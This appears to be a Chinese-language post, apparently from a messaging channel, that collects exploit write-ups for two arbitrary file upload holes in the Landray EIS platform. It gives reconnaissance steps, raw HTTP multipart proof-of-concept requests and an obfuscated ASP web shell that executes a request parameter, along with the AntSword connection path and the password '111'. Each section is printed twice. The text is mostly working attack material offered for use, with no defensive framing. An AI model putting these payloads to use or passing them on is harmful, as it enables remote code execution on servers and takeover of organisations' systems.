蓝凌-EIS frm_form_upload.aspx 接口 前台任意文件上传漏洞
app="Landray-EIS智慧协同平台"
漏洞点:访问 http://xxx/frm/frm_form_upload.aspx
如果访问状态码为200或者500都说明存在漏洞,500是存在漏洞但是没有cookies。访问原始地址抓包请求即可获取前半段cookies,再拼接FIOA_IMG_FOLDER=FI; Lang=zh-cn
拼接完cookies再访问再次访问 /frm/frm_form_upload.aspx页面获取csrf token,这个token填入后面poc的__VIEWSTATE参数
poc:
POST /frm/frm_form_upload.aspx HTTP/1.1
Host:
Cookie: FIOA_IMG_FOLDER=FI; Lang=zh-cn; ASP.NET_SessionId=j……5
Content-Type: multipart/form-data; boundary=4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Length: 2871
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.9582.25 Safari/537.36
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__VIEWSTATE"
步骤3中获取的值
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTTARGET"
GB_SAVE
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTARGUMENT"
保存
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="tpfile"; filename="xnwafhpcm.aspx"
Content-Type: image/png
……
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308--
文件地址:http://xxx/frm/frm_pics/2…….aspx
app="Landray-EIS智慧协同平台"
漏洞点:访问 http://xxx/frm/frm_form_upload.aspx
如果访问状态码为200或者500都说明存在漏洞,500是存在漏洞但是没有cookies。访问原始地址抓包请求即可获取前半段cookies,再拼接FIOA_IMG_FOLDER=FI; Lang=zh-cn
拼接完cookies再访问再次访问 /frm/frm_form_upload.aspx页面获取csrf token,这个token填入后面poc的__VIEWSTATE参数
poc:
POST /frm/frm_form_upload.aspx HTTP/1.1
Host:
Cookie: FIOA_IMG_FOLDER=FI; Lang=zh-cn; ASP.NET_SessionId=j……5
Content-Type: multipart/form-data; boundary=4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Length: 2871
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.9582.25 Safari/537.36
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__VIEWSTATE"
步骤3中获取的值
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTTARGET"
GB_SAVE
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTARGUMENT"
保存
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="tpfile"; filename="xnwafhpcm.aspx"
Content-Type: image/png
……
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308--
文件地址:http://xxx/frm/frm_pics/2…….aspx
👍1
蓝凌EIS任意文件上传漏洞
exp:
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 192
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="Oracle.asp"
Content-Type: text/html
<%
<!--
Class C8t6
public property let SXEWH(DlB2YiH48)
exeCute(DlB2YiH48)REM IXMQD)
end property
End Class
Set a= New C8t6
a.SXEWH= request("111")
-->
%>
------WebKitFormBoundaryxdgaqmqu--
蚁剑连接地址:/files/editor_img/xxxx.asp(你上传的文件会被时间戳重命名,不过在response里能看到)
密码:111
exp:
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 192
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="Oracle.asp"
Content-Type: text/html
<%
<!--
Class C8t6
public property let SXEWH(DlB2YiH48)
exeCute(DlB2YiH48)REM IXMQD)
end property
End Class
Set a= New C8t6
a.SXEWH= request("111")
-->
%>
------WebKitFormBoundaryxdgaqmqu--
蚁剑连接地址:/files/editor_img/xxxx.asp(你上传的文件会被时间戳重命名,不过在response里能看到)
密码:111
👍4